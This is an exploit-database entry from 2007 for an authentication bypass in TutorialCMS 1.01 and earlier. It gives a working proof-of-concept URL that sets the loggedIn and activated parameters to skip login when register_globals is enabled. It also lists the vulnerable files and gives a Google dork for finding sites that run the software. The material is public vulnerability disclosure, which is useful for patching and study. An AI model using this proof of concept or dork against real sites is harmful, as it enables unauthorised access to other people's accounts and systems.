TutorialCMS - exploit.company

vendor:

by:

Silentz

N/A

CVSS

N/A

Authentication Bypass

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

TutorialCMS <= 1.01 Authentication Bypass

Variables $loggedIn & $activated are not predefined. Vulnerable files: login.php, headerLinks.php, submit1.php, myFav.php, userCP.php. PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1. Subject To: register_globals set to on. GoogleDork: "Powered By Photoshop Tutorials".

Mitigation:

Source

Exploit-DB raw data:

#################################################################################
#										#
#		     TutorialCMS <= 1.01 Authentication Bypass			#
#										#
# Discovered by: Silentz							#
# Payload: Authentication Bypass						#
# Website: http://www.w4ck1ng.com						#
# 										#
# Vulnerability:								#
#										#
#	Variables $loggedIn & $activated are not predefined.			#
#										#
# Vulnerable Files:								#
#      										#
#	login.php								#
#	headerLinks.php								#
#	submit1.php								#
#	myFav.php								#
#	userCP.php								#
#										#
#										#
# PoC: http://victim.com/tutorialcms/userCP.php?loggedIn=1&activated=1		#
# 										#
# Subject To: register_globals set to on					#
# GoogleDork: "Powered By Photoshop Tutorials" 					#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
# Notes to developers:								#
#										#
#	You should allways fully disclose the vulnerabilities before someone	#
#       else does, just looks better. Also, try changing the "Date Modified" 	#
#	stamp on the files before you wrap it up for upload ;)			#
#										#
#################################################################################

# milw0rm.com [2007-05-21]